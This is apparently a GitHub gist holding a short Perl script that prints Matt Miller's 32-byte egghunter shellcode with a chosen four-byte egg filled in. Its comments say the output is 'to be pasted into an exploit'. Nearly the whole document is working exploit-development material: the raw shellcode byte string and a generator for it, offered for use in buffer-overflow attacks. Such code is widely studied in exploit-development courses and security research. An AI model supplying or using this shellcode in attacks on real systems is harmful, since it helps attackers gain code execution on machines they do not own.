Generate 32 bytes egg hunter code, based on Matt Miller's implementation
#!/usr/bin/perl | |
# Prints egghunter code to be pasted into an exploit. | |
# Example: | |
# $ ./egghunter.pl 41424344 | |
use strict; | |
use warnings; | |
# This is the egghunter implementation by Matt Miller, $ARGV[0] will be placed instead of the egg | |
my $egghunter = "\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x%s\\x%s\\x%s\\x%s\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7"; | |
my $egg = $ARGV[0]; | |
my @chars = ($egg =~ m/../g); | |
print("# Egghunter 32 bytes - Egg: $egg\n\n"); | |
printf($egghunter, @chars); | |
print("\n"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment